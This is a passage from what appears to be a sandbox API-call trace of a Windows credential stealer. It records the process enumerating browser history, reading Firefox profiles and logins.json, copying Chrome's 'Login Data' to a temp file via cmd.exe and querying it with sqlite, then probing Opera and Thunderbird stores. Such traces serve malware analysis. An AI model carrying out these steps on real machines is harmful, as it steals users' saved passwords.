rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.849] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.849] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.849] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.849] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.850] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.850] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.850] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.857] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.858] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.859] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.860] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.860] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.860] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.860] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.860] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.861] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.861] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.862] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.862] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.862] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.862] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.863] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.864] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.864] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.864] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.864] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0295.864] IEnumSTATURL:Next (in: This=0x5304a0, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x0) returned 0x1 [0295.885] IUnknown:Release (This=0x5304a0) returned 0x0 [0295.919] IUnknown:Release (This=0x50fb60) returned 0x1 [0295.919] CoUninitialize () [0295.942] NtEnumerateValueKey (in: KeyHandle=0x220, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xddb90, Length=0x800, ResultLength=0xdea48 | out: KeyValueInformation=0xddb90, ResultLength=0xdea48) returned 0x8000001a [0295.942] NtClose (Handle=0x220) returned 0x0 [0295.953] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x8514020) returned 1 [0295.971] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7374) returned 0x562da0 [0295.973] NtCreateKey (in: KeyHandle=0xde9ac, DesiredAccess=0x20219, ObjectAttributes=0xde824*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde9ac*=0x220) returned 0x0 [0295.973] NtQueryValueKey (in: KeyHandle=0x220, ValueName="CurrentVersion", KeyValueInformationClass=0x1, KeyValueInformation=0x563208, Length=0x100, ResultLength=0xde994 | out: KeyValueInformation=0x563208*(TitleIndex=0x0, Type=0x1, DataOffset=0x30, DataLength=0x22, NameLength=0x1c, Name="CurrentVersion", Data="39.0 (x86 en-US)"), ResultLength=0xde994) returned 0x0 [0295.974] NtClose (Handle=0x220) returned 0x0 [0295.983] RtlCharToInteger (in: String="39.0 (x86 en-US)", Base=0x0, Value=0x562da4 | out: Value=0x562da4) returned 0x0 [0295.983] NtCreateKey (in: KeyHandle=0xde9ac, DesiredAccess=0x20219, ObjectAttributes=0xde844*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Firefox\\39.0 (x86 en-US)\\Main", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde9ac*=0x220) returned 0x0 [0295.983] NtQueryValueKey (in: KeyHandle=0x220, ValueName="Install Directory", KeyValueInformationClass=0x1, KeyValueInformation=0x562e08, Length=0x200, ResultLength=0xde994 | out: KeyValueInformation=0x562e08*(TitleIndex=0x0, Type=0x1, DataOffset=0x38, DataLength=0x4e, NameLength=0x22, Name="Install Directory", Data="C:\\Program Files (x86)\\Mozilla Firefox"), ResultLength=0xde994) returned 0x0 [0295.984] NtClose (Handle=0x220) returned 0x0 [0295.984] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="PATH", Value=0xde5f0 | out: Value="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x0 [0296.004] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files (x86)\\Mozilla Firefox" | out: Environment=0x0) returned 0x0 [0296.004] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="C:\\Program Files (x86)\\Mozilla Firefox\\nss3.dll", BaseAddress=0xde5e8 | out: BaseAddress=0xde5e8*=0x6df90000) returned 0x0 [0297.827] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde7a4 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0297.835] GetPrivateProfileSectionNamesW (in: lpszReturnBuffer=0x569914, nSize=0x1000, lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpszReturnBuffer="General") returned 0x11 [0297.852] GetPrivateProfileStringW (in: lpAppName="Profile0", lpKeyName="PATH", lpDefault=0x0, lpReturnedString=0x56770c, nSize=0x104, lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" | out: lpReturnedString="Profiles/ijfigeuq.default") returned 0x19 [0297.855] NSS_Init () returned 0x0 [0298.769] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\logins.json", NtPathName=0xde6cc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\logins.json", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.855] NtCreateFile (in: FileHandle=0xde6ec, DesiredAccess=0x120089, ObjectAttributes=0xde6b4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\\ijfigeuq.default\\logins.json", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde6d4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde6ec*=0x0, IoStatusBlock=0xde6d4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0298.855] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x55c4b0) returned 1 [0298.855] NSS_Shutdown () returned 0x0 [0298.865] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde094 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0298.865] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0xde068, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0298.865] NtCreateFile (in: FileHandle=0xde088, DesiredAccess=0x120089, ObjectAttributes=0xde050*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde070, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde088*=0x358, IoStatusBlock=0xde070*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0298.866] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x55a5b0) returned 1 [0298.866] NtQueryInformationFile (in: FileHandle=0x358, IoStatusBlock=0xde070, FileInformation=0xddfc8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde070, FileInformation=0xddfc8) returned 0x0 [0298.866] NtClose (Handle=0x358) returned 0x0 [0299.097] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0xde090 | out: Value="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x0 [0299.097] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdd524, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0299.097] NtCreateFile (in: FileHandle=0xdd544, DesiredAccess=0x120089, ObjectAttributes=0xdd50c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdd52c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdd544*=0x358, IoStatusBlock=0xdd52c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0299.098] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x56a9c0) returned 1 [0299.098] NtQueryInformationFile (in: FileHandle=0x358, IoStatusBlock=0xdd52c, FileInformation=0xdd2a0, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdd52c, FileInformation=0xdd2a0) returned 0x0 [0299.098] NtClose (Handle=0x358) returned 0x0 [0299.098] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x208) returned 0x56fee8 [0299.098] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x56fee8) returned 1 [0299.098] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmd.exe", lpCommandLine="/c copy \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1\" /V", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xddbf4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xddc38, hNewToken=0x0 | out: lpProcessInformation=0xddc38*(hProcess=0x354, hThread=0x358, dwProcessId=0xd60, dwThreadId=0xd64), hNewToken=0x0) returned 1 [0299.129] NtWaitForSingleObject (Object=0x354, Alertable=0, Time=0x0) returned 0x0 [0302.022] sqlite3_open () returned 0x0 [0302.090] sqlite3_prepare_v2 () returned 0x0 [0302.101] sqlite3_step () returned 0x65 [0302.101] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xddfec | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0302.101] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0xddfd0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.102] NtCreateFile (in: FileHandle=0xddff0, DesiredAccess=0x120089, ObjectAttributes=0xddfb8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xddfd8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xddff0*=0x0, IoStatusBlock=0xddfd8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.102] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x55a3a0) returned 1 [0302.102] RtlSetEnvironmentVariable (in: Environment=0x0, Name="PATH", Value="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" | out: Environment=0x0) returned 0x0 [0302.102] NtCreateKey (in: KeyHandle=0xde9a4, DesiredAccess=0x20219, ObjectAttributes=0xde81c*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\Machine\\SOFTWARE\\Mozilla\\Mozilla Thunderbird\\", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xde9a4*=0x0) returned 0xc0000022 [0302.102] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xde554 | out: Value="C:\\Program Files (x86)") returned 0x0 [0302.102] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtPathName=0xde528, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.102] NtCreateFile (in: FileHandle=0xde548, DesiredAccess=0x120089, ObjectAttributes=0xde510*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde530, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde548*=0x35c, IoStatusBlock=0xde530*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.102] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5582b0) returned 1 [0302.102] NtQueryInformationFile (in: FileHandle=0x35c, IoStatusBlock=0xde530, FileInformation=0xde488, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde530, FileInformation=0xde488) returned 0x0 [0302.102] NtClose (Handle=0x35c) returned 0x0 [0302.103] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x562da0) returned 1 [0302.103] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde60c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0302.103] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0xde5e0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.103] NtCreateFile (in: FileHandle=0xde600, DesiredAccess=0x120089, ObjectAttributes=0xde5c8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde5e8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde600*=0x35c, IoStatusBlock=0xde5e8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0302.104] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x559e20) returned 1 [0302.104] NtQueryInformationFile (in: FileHandle=0x35c, IoStatusBlock=0xde5e8, FileInformation=0xde540, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde5e8, FileInformation=0xde540) returned 0x0 [0302.104] NtClose (Handle=0x35c) returned 0x0 [0302.104] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde55c | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0302.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0xde540, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0302.104] NtCreateFile (in: FileHandle=0xde560, DesiredAccess=0x120089, ObjectAttributes=0xde528*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde548, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde560*=0x0, IoStatusBlock=0xde548*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0302.104] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x559d70) returned 1 [0302.106] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xddc2c | out: Value="C:\\Program Files (x86)") returned 0x0 [0302.116] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x526d60 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, 